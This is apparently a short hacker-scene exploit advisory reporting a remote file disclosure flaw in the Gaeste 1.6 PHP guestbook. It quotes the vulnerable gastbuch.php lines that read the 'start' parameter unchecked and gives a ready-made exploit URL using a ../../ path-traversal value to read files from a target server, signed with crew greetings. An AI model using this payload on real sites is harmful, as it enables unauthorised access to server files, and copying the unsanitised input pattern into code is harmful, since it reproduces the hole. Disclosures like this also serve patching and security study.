Gaeste version 1.6 suffers from a remote file disclosure vulnerability in gastbuch.php.
8feb5fa1d56e32903df4dabcb44642275fe4ba7e8ea5722d35981bb1af9bdfca
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
+ +
+ bd0rk || SOH-Crew +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Vendor: http://www.php4scripte.de/
=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip
=> Bugfound3R: bd0rk
=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)
=> Vulnerable Code in gastbuch.php line 2-3
-------------------------------
if (isset($_GET['start'])) {
$start=$_GET['start'];
-------------------------------
[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php
###The 20 years old, german Hacker bd0rk###